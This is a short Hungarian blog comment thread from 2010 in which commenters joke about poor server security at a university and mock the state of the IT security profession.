"Elkaptam harminc támadót, fejüket szét tudtam volna verve, de a harmincegyedik bejött."

:))))))))

Miről beszélsz Laci, az egyetemen is mindenki ki-be járkált a szervereiteken, annyira nulla volt rajtuk a biztonság.

xShark 2010.01.10. 08:35:26

"Mert senkihaziak kezelben van az IT security szakma..." :-)
süti beállítások módosítása